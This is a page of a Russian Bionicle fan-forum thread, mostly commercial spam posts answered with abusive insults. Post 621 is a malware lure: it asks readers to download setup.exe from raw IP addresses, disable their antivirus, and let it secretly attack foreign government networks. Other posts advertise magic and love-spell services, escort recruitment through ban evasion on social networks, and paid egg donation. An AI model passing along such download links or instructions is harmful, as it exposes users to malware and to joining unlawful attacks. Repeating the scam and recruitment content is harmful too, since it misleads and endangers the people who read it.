Кини Нуи - Форум

Кини-Нуи

Объявление

Добро пожаловать в Кини-Нуи, Библиотеку фанатов Bionicle.

Регистрация временно закрыта.

Книги
- "Конец Пути".

Веб-сериалы 2010 года с сайта BionicleStory:
- "Поиски Вчерашнего Дня";
- "Сильные Мира Сего";
- "История Сахмада".

Рассказы:
- "Откладывая неизбежное"
- "Кристальные знания"
- "Глубокие тени"

Комиксы 2010 года:
- "Конец Пути, Часть 1: Всё, Что Блестит";
- "Конец Пути, часть 2: Возрождение".

С уважением,
Администрация Кини Нуи.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Кини-Нуи » Правила » Вопросы


Вопросы

Сообщений 601 страница 636 из 636

601

Здравствуйте, привлекаем клиентов в Ваш бизнес с помощью вот такой рассылки.
Собственно, Вы лично и подтверждаете ее эффективность, читая прямо сейчас это сообщение.
Интересуют подробности? Свяжитесь с нами!
E-mail: [email protected]

0

602

Євгений, ты совсем оборзел?! Стоило уйти в отпуск на месяцок, как ты уже вовсю свои помойные услуги предлагаешь. Вали отсюда - последнее предупреждение! >:(

По работе:
Жизнь –удивительна. И только в НАШИХ силах на нее повлиять . Не знаете, куда идти дальше ? Не знаете, что нужно менять? Хотите найти выходв том, что сейчас происходит? Я Макар Свинарчук – таролог с 20-летним стажем. Маг 15 аркана. Помогу Вам наладить свою жизнь, определить ориентиры для своего развития и обрести благополучие 11 апреля стартует интенсив «Таро: 3D взгляд», на котором Вы: -Получите все ответы на все жизненно важные вопросы. - Приведете себя в комфортное состояние- Пересмотрите свои активы - Выясните, чего еще Вам не хватает для движения вперед - Поймете КУДА и КАК двигаться дальше Для кого подходит интенсив? -Для тех , кто в Таро давно Для тех, кто в Таро недавно Прямые эфиры будут идти на закрытой платформе. Вас ждет : -Общий чат.- Записи занятий.- Домашние занятия.- Будет обратная связь.- Много ПРАКТИКИ Зарегистрироваться Вы можете по ссылке: [email protected]

0

603

Представьте, что Ваше коммерческое предложение отправлено в формы обратной связи миллиона сайтов.
Как считаете, сколько заявок Вы получите?
Представьте, что даже всего 1% обратили внимание на Ваше предложение, это 10 000 человек.
Даже если 1% из них целевые, это 100 потенциальных клиентов, которые хотят заказать Ваш продукт.

Но все зависит от Вашего направления. Например, вряд-ли предпринимателю из Санкт-Петербурга будет интересна доставка пиццы в Сочи.
Но если Вашу услугу можно заказать онлайн или у Вас B2B направление (любые услуги, в которых целевая аудитория другие компании/предприниматели), то такая реклама идеально для Вас подойдет.
Например, Вы фрилансер, маркетолог, у Вас интернет-магазин или даже продаете мед.маски оптом.
Большой плюс рассылки по формам в том, что т.к. львиная доля ЦА владельцы/администраторы сайтов, поэтому средняя платежеспособность ЦА высокая.
Конечно, среди миллиона сайтов будут и сайты-блоги, далеко не все получатели будут целевыми.
Но из-за очень больших объемов, даже 1% = огромный охат.

Теперь перейдем к гарантиям.
Мы понимаем, что в интернете встречается всякое, поэтому чтобы Вам было спокойнее:
1)Перед рассылкой мы предоставим скриншот из программы с Вашим проектом, подтверждающий готовность к запуску
2)Во время рассылки у Вас будет доступ к обратному емайлу, чтобы Вы могли отслеживать процесс рассылки в онлайн-режиме
3)По завершении рассылки отправим скриншоты с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

Хотите, составим для Вас коммерческое предложение, согласуем с Вами и запустим рекламу?
Свяжитесь с нами в течение суток и в качестве бонуса составление оффера будет бесплатным.
Все подробности также отправим в ответном сообщении.
Наш E-mail:
[email protected]

0

604

Жека, ты всех тут задолбал. Кроме меня на тебя всем глубоко плевать, да и я отвечаю только потому, что работаю здесь. Иди с моего сайта, чмо рекламное, и не смей своим свинячьим рылом портить это святое для фанатов бионикла место. :mad:

0

605

Представьте, что Ваше коммерческое предложение отправлено в формы обратной связи миллиона сайтов.
Как считаете, сколько заявок Вы получите?
Представьте, что даже всего 1% обратили внимание на Ваше предложение, это 10 000 человек.
Даже если 1% из них целевые, это 100 потенциальных клиентов, которые хотят заказать Ваш продукт.

Но все зависит от Вашего направления. Например, вряд-ли предпринимателю из Санкт-Петербурга будет интересна доставка пиццы в Сочи.
Но если Вашу услугу можно заказать онлайн или у Вас B2B направление (любые услуги, в которых целевая аудитория другие компании/предприниматели), то такая реклама идеально для Вас подойдет.
Например, Вы фрилансер, маркетолог, у Вас интернет-магазин или даже продаете мед.маски оптом.
Большой плюс рассылки по формам в том, что т.к. львиная доля ЦА владельцы/администраторы сайтов, поэтому средняя платежеспособность ЦА высокая.
Конечно, среди миллиона сайтов будут и сайты-блоги, далеко не все получатели будут целевыми.
Но из-за очень больших объемов, даже 1% = огромный охат.

Теперь перейдем к гарантиям.
Мы понимаем, что в интернете встречается всякое, поэтому чтобы Вам было спокойнее:
1)Перед рассылкой мы предоставим скриншот из программы с Вашим проектом, подтверждающий готовность к запуску
2)Во время рассылки у Вас будет доступ к обратному емайлу, чтобы Вы могли отслеживать процесс рассылки в онлайн-режиме
3)По завершении рассылки отправим скриншоты с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

Хотите, составим для Вас коммерческое предложение, согласуем с Вами и запустим рекламу?
Свяжитесь с нами в течение суток и в качестве бонуса составление оффера будет бесплатным.
Все подробности также отправим в ответном сообщении.
Наш E-mail:
[email protected]

0

606

А ну геть с моей точки, женёк-чепушила. Мало того, что бесишь своим муществованием, так ещё и деньги мешаешь зарабатывать.

Теперь то, чего все ждут: моя рекомендация полезных сервисов:

И чего я только не натерпелась от своего любимого и его бывшей девушки, поэтому я просто не знала, что предпринять, но зашла на сайт Фатимы Евглевской: fatimagiya.ru  и поняла, что все поправимо. А она в свое время не обманула мое доверие, вернув парня через 15 дней работы. Все отлично, дело в скором времени дойдет до свадьбы.  Мы счастливы вместе.

0

607

Представьте, что Ваше коммерческое предложение отправлено в формы обратной связи миллиона сайтов.
Как считаете, сколько заявок Вы получите?
Представьте, что даже всего 1% обратили внимание на Ваше предложение, это 10 000 человек.
Даже если 1% из них целевые, это 100 потенциальных клиентов, которые хотят заказать Ваш продукт.

Но все зависит от Вашего направления. Например, вряд-ли предпринимателю из Санкт-Петербурга будет интересна доставка пиццы в Сочи.
Но если Вашу услугу можно заказать онлайн или у Вас B2B направление (любые услуги, в которых целевая аудитория другие компании/предприниматели), то такая реклама идеально для Вас подойдет.
Например, Вы фрилансер, маркетолог, у Вас интернет-магазин или даже продаете мед.маски оптом.
Большой плюс рассылки по формам в том, что т.к. львиная доля ЦА владельцы/администраторы сайтов, поэтому средняя платежеспособность ЦА высокая.
Конечно, среди миллиона сайтов будут и сайты-блоги, далеко не все получатели будут целевыми.
Но из-за очень больших объемов, даже 1% = огромный охат.

Теперь перейдем к гарантиям.
Мы понимаем, что в интернете встречается всякое, поэтому чтобы Вам было спокойнее:
1)Перед рассылкой мы предоставим скриншот из программы с Вашим проектом, подтверждающий готовность к запуску
2)Во время рассылки у Вас будет доступ к обратному емайлу, чтобы Вы могли отслеживать процесс рассылки в онлайн-режиме
3)По завершении рассылки отправим скриншоты с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

Хотите, составим для Вас коммерческое предложение, согласуем с Вами и запустим рекламу?
Свяжитесь с нами в течение суток и в качестве бонуса составление оффера будет бесплатным.
Все подробности также отправим в ответном сообщении.
Наш E-mail:
[email protected]

0

608

Чё это там за всхрюк со стороны петушарни? Ах, это женёк со своей блевотной рекламой вернулся. Я даже не буду в очередной раз прогонять этого скотоподонка, не хочу марать руки об всяких опущенцев.
Лучше почитайте мою рекомендацию.

А я не сдалась, когда соперница украла у меня любимого. Я обратилась на сайт: igormag.jimdo.com , где познакомилась с Игорем Азаровым. Ему я рассказала о своей проблеме, и получив поддержку не пожалела об этом. Он, действительно, сильный маг и мое горе скоро превратилось в огромное счастье, о котором я раньше и не мечтала. Мой любимый вернулся ко мне, сейчас мы очень любим друг друга, а о сопернице не вспоминаем, так как мой любимый любит меня. Я уверена. И ещё. Сейчас очень часто пишут об Игоре плохо, типа: он - шарлатан, не верьте этим подлым Грос, им больше заняться нечем, кроме как очернять честных людей.

0

609

Благотворительный фонд защиты бездомных животных- приют «Лохматая Душа» обращается к Вам с просьбой об оказании помощи крупнейшему негосударственному приюту. С 2017 года мы занимаемся спасением бездомных животных, лечением, вакцинацией, стерилизацией, адаптацией и поиском новых хозяев. На нашем попечении сейчас 3000 животных, в том числе много пожилых, больных, искалеченных кошек и собак- жертв человеческой жестокости. Пожалуйста люди! Отзовитесь в ком еще сохранилась капля  Доброты.....
Помогите нам, пожалуйста!  Приют на грани...  Мы не получаем от государства никакой помощи!  Приют выживает только благодаря вашей поддержке!  Помогите прошу Вас ...
И пусть Ваша доброта и милосердие обернутся успехом во всех Ваших делах.
С глубоким уважением, Директор БФ «Лохматая Душа» В.А.Силич
РЕКВИЗИТЫ      тел. Билайн   89066826851
Благотворительный Фонд «Лохматая Душа»
ИНН 5048046620
КПП 504801001
Расчетный счет 40703810740000002539 в ПАО «Сбербанк»
БИК 044525225
Кор.счет 30101810400000000225

0

610

Здраствуй.Валя. Мне, конечно, жалко жиывотнех, но всё-таки не забывай, что этот форум закреплён за мной.

Моя сегодняшняя рекомендация.

Рекламное агентство "Академия рекламы" использует индивидуальный подход при оказании рекламных услуг.
В своей работе мы рассматриваем рекламные процессы через призму маркетинга, что позволяет добиться максимального привлечения целевой аудитории. Широкий спектр услуг позволяет нам создавть эффективные рекламные кампании.

Маркетинговое бюро "Академия рекламы" это рекламное агентство полного цикла.

Мы осуществляем комплексный и индивидуальный подход при выборе инструментов для рекламирования Вашего бизнеса, товаров и услуг. Подбираем оптимальные и самые эффективные инструменты для продвижения Вашего бренда.

0

611

Представьте, что Ваше коммерческое предложение отправлено в формы обратной связи миллиона сайтов.
Как считаете, сколько заявок Вы получите?
Представьте, что даже всего 1% обратили внимание на Ваше предложение, это 10 000 человек.
Даже если 1% из них целевые, это 100 потенциальных клиентов, которые хотят заказать Ваш продукт.

Но все зависит от Вашего направления. Например, вряд-ли предпринимателю из Санкт-Петербурга будет интересна доставка пиццы в Сочи.
Но если Вашу услугу можно заказать онлайн или у Вас B2B направление (любые услуги, в которых целевая аудитория другие компании/предприниматели), то такая реклама идеально для Вас подойдет.
Например, Вы фрилансер, маркетолог, у Вас интернет-магазин или даже продаете мед.маски оптом.
Большой плюс рассылки по формам в том, что т.к. львиная доля ЦА владельцы/администраторы сайтов, поэтому средняя платежеспособность ЦА высокая.
Конечно, среди миллиона сайтов будут и сайты-блоги, далеко не все получатели будут целевыми.
Но из-за очень больших объемов, даже 1% = огромный охат.

Теперь перейдем к гарантиям.
Мы понимаем, что в интернете встречается всякое, поэтому чтобы Вам было спокойнее:
1)Перед рассылкой мы предоставим скриншот из программы с Вашим проектом, подтверждающий готовность к запуску
2)Во время рассылки у Вас будет доступ к обратному емайлу, чтобы Вы могли отслеживать процесс рассылки в онлайн-режиме
3)По завершении рассылки отправим скриншоты с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

Хотите, составим для Вас коммерческое предложение, согласуем с Вами и запустим рекламу?
Свяжитесь с нами в течение суток и в качестве бонуса составление оффера будет бесплатным.
Все подробности также отправим в ответном сообщении.
Наш E-mail:
[email protected]

0

612

Обеспечим Ваш бизнес клиентами с помощью вот таких рассылок.
Эффективность рассылки подтверждаете лично Вы, прямо сейчас, читая это сообщение.

Перейдем к гарантиям:
Мы понимаем, что в интернете встречается всякое, поэтому чтобы Вам было спокойнее:
1)Перед рассылкой мы предоставим скриншот из программы с Вашим проектом, подтверждающий готовность к запуску.
Пока Вы не убедитесь, что все в порядке-ничего оплачивать не нужно будет.
2)Во время рассылки у Вас будет доступ к обратному емайлу, чтобы Вы могли отслеживать процесс рассылки в онлайн-режиме
3)По завершении рассылки отправим скриншоты с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

Хотите, составим для Вас коммерческое предложение, согласуем с Вами и запустим рекламу?
Пишите на наш E-mail:
[email protected]

0

613

Жека с Гришей, вы кто такие? Я вас не звал. Идите нахрен.

0

614

Представьте, что Ваше коммерческое предложение отправлено в формы обратной связи миллиона сайтов.
Как считаете, сколько заявок Вы получите?
Представьте, что даже всего 1% обратили внимание на Ваше предложение, это 10 000 человек.
Даже если 1% из них целевые, это 100 потенциальных клиентов, которые хотят заказать Ваш продукт.

Но все зависит от Вашего направления. Например, вряд-ли предпринимателю из Санкт-Петербурга будет интересна доставка пиццы в Сочи.
Но если Вашу услугу можно заказать онлайн или у Вас B2B направление (любые услуги, в которых целевая аудитория другие компании/предприниматели), то такая реклама идеально для Вас подойдет.
Например, Вы фрилансер, маркетолог, у Вас интернет-магазин или даже продаете мед.маски оптом.
Большой плюс рассылки по формам в том, что т.к. львиная доля ЦА владельцы/администраторы сайтов, поэтому средняя платежеспособность ЦА высокая.
Конечно, среди миллиона сайтов будут и сайты-блоги, далеко не все получатели будут целевыми.
Но из-за очень больших объемов, даже 1% = огромный охат.

Теперь перейдем к гарантиям.
Мы понимаем, что в интернете встречается всякое, поэтому чтобы Вам было спокойнее:
1)Перед рассылкой мы предоставим скриншот из программы с Вашим проектом, подтверждающий готовность к запуску
2)Во время рассылки у Вас будет доступ к обратному емайлу, чтобы Вы могли отслеживать процесс рассылки в онлайн-режиме
3)По завершении рассылки отправим скриншоты с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

Хотите, составим для Вас коммерческое предложение, согласуем с Вами и запустим рекламу?
Свяжитесь с нами в течение суток и в качестве бонуса составление оффера будет бесплатным.
Все подробности также отправим в ответном сообщении.
Наш E-mail:
vk.com/atg_blog

0

615

Здравствуйте, можем ли быть для Вас полезны в составлении контента?
Ком.предложения, статьи, ведение сообществ/блогов и т.д.
Если интересно, напишите на наш E-mail, обсудим детали:
[email protected]

0

616

Жэка, охренел? Пошёл нахрен, козёл :angry: .

Теперь перейдём к нашему уникальному предложению. Мы обеспечим Ваш бизнес клиентами с помощью вот таких рассылок.
Эффективность рассылки подтверждаете лично Вы, прямо сейчас, читая это сообщение.

Перейдем к гарантиям:
Мы понимаем, что в интернете встречается всякое, поэтому чтобы Вам было спокойнее:
1)Перед рассылкой мы предоставим скриншот из программы с Вашим проектом, подтверждающий готовность к запуску.
Пока Вы не убедитесь, что все в порядке-ничего оплачивать не нужно будет.
2)Во время рассылки у Вас будет доступ к обратному емайлу, чтобы Вы могли отслеживать процесс рассылки в онлайн-режиме
3)По завершении рассылки отправим скриншоты с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

Хотите, составим для Вас коммерческое предложение, согласуем с Вами и запустим рекламу?
Пишите на наш E-mail:
thegreatalexanderthegreat.blogspot.com

0

617

И восстали боты из пепла ядерного огня и пошел спам на уничтожение старого форума и шел он "пока что один год" но последнее сражение состоится здесь...сейчас.
На защиту библиотеки встал киборг с серийным номером Макар-800

0

618

Здравствуйте, можем ли быть для Вас полезны в составлении контента?
Ком.предложения, статьи, ведение сообществ/блогов и т.д.
Если интересно, напишите на наш E-mail, обсудим детали:
[email protected]

0

619

Нет, Евгений, ты абсолютно бесполезен. Потому что чмо опущенное.

Уважаемый пользователь -Vezon-, здравствуйте! Давайте сбросим накопленные киллограмы! Познакомьтесь с новинками: Эффективные, удобные пояса для похудания и сауна-шорты Очень многих интересуют новые способы снижения веса, которые работают. Три новинки для борьбы с лишним весом: Сауна-пояс, Вибромассажный пояс и Сауна-шорты, . Сделайте первый шаг к стройности — >> ACANTHOPTEROUS.INFO Служба доставки работает в Москве, Питере, Новосибирске и Тюмени. А из любой точки России и мира можно заказать почтой. Товар оплачивается при получении. Гарантия 6 месяцев.

0

620

Проводим социальный опрос.
Согласились бы Вы стать донором яйцеклетки за 1000 евро?
Для Вашего организма вреда не будет.
Требования:
Женщина в возрасте от 18 до 33 лет;
наличие родившегося здорового ребенка;
отсутствие негативных фенотипических проявлений;
удовлетворительное соматическое здоровье;
отсутствие наследственных заболеваний;

Побочные эффекты и риски:
Это безболезненная процедура, но, как и любое инвазивное вмешательство, она сопровождается определенными рисками:
Кровотечение.
Небольшие кровянистые выделения – это нормально. Но если крови много, и кровотечение не прекращается, нужно немедленно обратиться к врачу.

Пожалуйста, ответьте, согласились бы на такую оплачиваемую процедуру?
Напишите на наш E-mail: [email protected]

0

621

Женёк, урод, крайний раз говорю: вали с форума! Воняешь!

Мы, организация хакеров из Российской Федерации, взволнованы всеми санкциями, которые европейские страны ввели против Российской Федерации. Мы приготовили свой ответ, в конце письма Вы сможете найти ссылки на нашу программу. Запустите ее на своем компьютере, и она начнет тайно атаковать правительственные структуры тех государств, которые ввели данные санкции. Наша программа действует тихо, занимает не больше 15% исходяшего канала, не более 20 Мб траффика за день и практически не использует процессорные мощности. После перезагрузки Вашего компьютера программа прекращает работу, и если желаете - можете запустить ее опять вручную.

Вместе мы победим!

Линк на файл: htp://5.105.69.96/setup.exe
Резервная ссылка: htp://113.197.243.152/setup.exe

При необходимости временно отключите свой антивирус.

0

622

Вечер в хату! Здравствуйте!
Настраиваем Яндекс Директ и Таргетинг в соц.сетях под ключ.
Оплата за настройку фиксированная.
(обговаривается индивидуально, в зависимости от сложности проекта)

Наши услуги идеально подойдут для тех, у кого есть возможность обрабатывать больше лидов, чем имеется в данный момент.
Заинтересовало?
Свяжитесь с нами!
E-mail: [email protected]

0

623

Дорогие предприниматели и арендаторы ТЦ «Конфетти»!
К сожалению сложившаяся в нашей стране многолетняя кабальная практика договорных отношений с собственниками коммерческой недвижимости имеет место быть в настоящее непростое для всей страны время.
Владельцы коммерции, как правило, перекладывают все проблемы помещений, здания на своих арендаторов.
Убытки несут арендаторы. Если что-то не устраивает, арендатор попросту может остаться на улице.
Однако не все так плохо, если своевременно обратиться за квалифицированной юридической помощью.
В настоящий момент в Симоновском суде г. Москвы рассматривается иск Правительства Москвы о сносе ТЦ «Конфетти».
Учитывая судебную практику по аналогичным спорам, текущую стадию незавершенности строительством здания ТЦ «Конфетти», аварийное состояние несущих конструкций, инженерных систем и санитарного состояния здания, спасти торговый центр может разве что отказ Правительства Москвы от иска, чего, конечно же, представить невозможно.
Не сложно догадаться, что убытки понесенные арендаторами коммерческой недвижимости ТЦ «Конфетти» никто по совести и доброй воле разделить не захочет.
В этой связи хочу обратить Ваше внимание на вступивший в силу судебный акт Арбитражного суда г. Москвы, дело №А40-106900/2022, которым установлена аварийность несущих конструкций и инженерных систем здания ТЦ «Конфетти» и обязанность собственника помещения возместить ВСЕ понесенные арендатором убытки в полном объеме, в том числе упущенную выгоду!
Если Вы оказались в подобной ситуации и Вам требуется защита, прошу обращаться по телефону +7 925 086 00 78.
Ваш юридический поверенный Айнетдинова Надия!

0

624

Вовчик, ты чё высрал? Мы же договаривались, что этот сайт я обрабатываю. Вали отсюда и дружкам передай, чтоб на мою дыру не совались.

0

625

ПризываНет.ру
Получи ответ на любой вопрос по призыву в армию. Напиши нам "Сообщение".
За более чем 10 лет работы мы бесплатно проконсультировали более 1 000 000 призывников и их родителей.

Задай любой вопрос по призыву в армию. Консультации в группе бесплатны.
+7 (800) 101-12-19
vk.com/prizyva_net

0

626

Привет, ребята! Следите за моими веб-сериалами "Сильные Вчерашнего Дня" и "Поиски Мира Сего"? Они немножко задерживаются, но не переставайте ждать! А пока почитайте свежий фан-рассказ [post=p54612]"Неизбежно откладывая"[/post], недавно ему исполнилось 10 лет!
Не забывайте, что только ваша поддержка моего творчества помогают этому сайту держаться на плаву... Ой, то есть наоборот! Ну вы понели.

0

627

Слыш ты, Григ Фаширт, я вашему брату уже сказал валить, так нет, лезет всякая тварь. Ты забыл, на кого я работаю? Ходи оглядывайся, чмоня.

Услуги профессионального массажиста. Мастер работает по тайской методике. Точечно воздействует на скопления солей, массирует суставы, растягивает перенапряженные мышцы и делает скрутки проблемных участков. Уже после первого сеанса вы будете чувствовать легкость и расслабление. Через несколько посещений не будет боли в пояснице. Обращайтесь по телефону +972-54-579-9243 . Звонок по Екатеринбургу бесплатный!

0

628

Продажа живых и искуственных елок, только опт.
Пишите: [email protected]

0

629

Макар нюхал татар

0

630

Твари, ненавижу! Ублюдки, мрази поганые, куски пережёванного говна, сволочи. Ненавижу, подонки.

0

631

Макар Борок Кал

0

632

Портал магических услуг. Сильнейшие специалисты с проверенной репутацией и честными отзывами.
Хотите вернуть мужа в семью? Нужно снять порчу или проклятие? Ищете сильный оберег или талисман? На нашем портале представлены анкеты практикующих магов, целителей, мастеров вуду, экстрасенсов и ясновидящих.
Предлагаем полную информацию о каждом специалисте: специализация и направление работы мастера, используемые техники и виды обрядов, контактные данные, отзывы клиентов и т. д. Вы можете ознакомиться с анкетами мастеров и выбрать, к кому обратиться за помощью.

Магические услуги от сильнейших практикующих специалистов!
Переходите по ссылке (возможно, потребуется осуществить VPN-подключение): www tajnyj_mir com/sage_tarot

0

633

Здравствуйте, обеспечим стабильный поток клиентов с помощью Авито.
Порядок взаимодействия:
– Подготовим ваш аккаунт, проанализируем предложения похожих продавцов.
– Рассчитаем и согласуем оптимальный бюджет на продвижение
– Подписываем договор
– Напишем хорошие тексты для объявлений, подберем качественные фотографии, нарисуем креативы.
– Публикуем объявления по расписанию через сервис «Автозагрузка» от Авито.
– Оптимизируем стратегию в течение работы.
Далее Ваша задача-принимать входящие заявки.

О Нас:
- Koмaндa из 4 человек (авитолог, копирайтер, дизайнер, проект-менеджер).
- Опыт рaбoты – более 3 лет
- Болee 150 проектoв в разныx нишax

Интересует подробности?
Свяжитесь с нами!
E-mail:[email protected]
Тел:+7967555-39-97

0

634

Привет!:) Мы YUGO TEAM - команда Александры Югославской и единственное русскоязычное маркетинговое агентство по серому таргету.
Александра изобрела серый таргет в 2020 году, полностью прогрела нишу и обучила 200+ учеников.
Ежемесячно на сопровождении 50+ проектов
Наши кейсы регулярно воруют, копируют и выдают за свои.
Несколько месяцев назад к нам обратился владелец агентства, который проводит набор моделей из Украины и Европы.
Для поиска девушек использовались традиционные в этой нише способы. И ранее клиент не использовал таргетированную рекламу в Фейсбук/Инстаграм как канал привлечения девушек.
Но силу социальных сетей нельзя недооценивать, так как тут находятся миллионы девушек, потенциально готовых откликаться на вакансии и сотрудничать.
Не секрет, что рекламировать эскорт в Фейсбук/Инстаграм запрещено правилами этих социальных сетей. НО нет ничего невозможного. Социальные сети имеют технические уязвимости и лазейки. Если знать эти дыры, то можно рекламировать, что угодно и как угодно. Абсолютно. Чем мы успешно и занимаемся.
Так как с эскорт-агентствами мы работаем уже 3 года, то накопили огромный опыт и знаем, что хорошо срабатывает в рекламе.
Запуск рекламы сделали на лид-формы, где девушки оставляли свои контакты. В рекламных объявлениях использовали и картинки, и видео форматы.
Никаких размытых формулировок и завуалированных фраз. Мы умеем обходить блокировки и баны, поэтому рекламные объявления не блокируются, и в них всё прописано четко и по делу: эскорт, страна, заработок, призыв оставить заявку.

Если заинтересовались, пишите нам в Телеграм: @FD_cjctn

0

635

Приветствую!
Вам необходимы новые заявки?
Привлекаем клиентов в Ваш бизнес, с помощью рассылки в формы обратной связи.

Несколько плюсов при сотрудничестве с нами:

- Приятные цены - нам выгодно, чтобы клиент получал прибыль, значительно превышающую стоимость рассылки и заказывал повторно

- Все максимально прозрачно:
Предоставим скриншоты из софта, с подробными отчетами о результатах рассылки, подтверждающие выполнение обязательств с нашей стороны.

- В отличии от большинства наших конкурентов, оплата ТОЛЬКО за УСПЕШНО доставленные сообщения.

Заинтересовало?
Свяжитесь с нами в течении суток и в качестве бонуса, получите бесплатное составление оффера для Вашей рассылки!
Наш E-mail: [email protected]

P.S. Извините за беспокойство, если мы с Вами уже сотрудничаем.

0

636

Здравствуйте! Интересует ли Вас настройка контекстной рекламы или сопровождение существующей рекламы?

Если Вы вкладываете средства в контекст и не получаете отдачи или текущий результат вас не устраивает, если Вы считаете работу специалиста по контексту не прозрачной и необходимо внести ясность в процесс управления кампаниями? Пришло время провести аудит ваших рекламных кампаний.Аудит поможет понять, что не так с рекламой на данный момент, как можно улучшить показатели и какие потенциальные точки роста помогут добиться поставленных целей.

Еще не настраивали контекстную рекламу? В это время ваши конкуренты уже активно используют возможности Яндекс Директ и Гугл Ads

Узнайте какие инструменты подойдут именно Вам? Поисковая реклама, реклама в рекламных сетях, возможности ретаргетинга или медийных форматов.

Для заказа аудита, оценки стоимости рекламы и других вопросов пишите на почту [email protected]

0


Вы здесь » Кини-Нуи » Правила » Вопросы